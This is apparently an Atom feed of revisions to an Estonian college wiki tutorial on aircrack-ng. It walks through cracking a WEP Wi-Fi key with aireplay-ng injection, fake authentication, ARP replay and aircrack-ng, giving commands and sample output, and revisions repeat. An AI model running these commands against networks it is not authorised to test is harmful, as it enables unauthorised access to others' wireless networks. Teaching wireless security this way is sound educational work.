18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89319</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89319"/>
		<updated>2015-05-25T19:39:53Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* WEP võtme murdmine */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Aircrack-ng 1.2 RC2 versiooni. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja&amp;lt;ref&amp;gt;[http://aircrack-ng.org/doku.php?id=simple_wep_crack#equipment_used Equipment used]&amp;lt;/ref&amp;gt;: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&amp;lt;br&amp;gt;&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liides:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Märge:&#039;&#039;&#039; Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;airmon-ng stop athX&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav &#039;&#039;airmon-ng stop ath0&#039;&#039; käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raadiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Kontrolli:&#039;&#039;&#039; Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-9 - “süstimise” test&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-e teddy – raadiovõrgu nimi&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Pane tähele!&#039;&#039;&#039; Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-c 9 – raadiovõrgu kanal&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühenduda&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-1 – võlts autentimine&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;0 – kordusühendus(t)e aeg sekundites&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
&#039;&#039;-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89316</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89316"/>
		<updated>2015-05-25T19:37:31Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Kasutatud kirjandus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
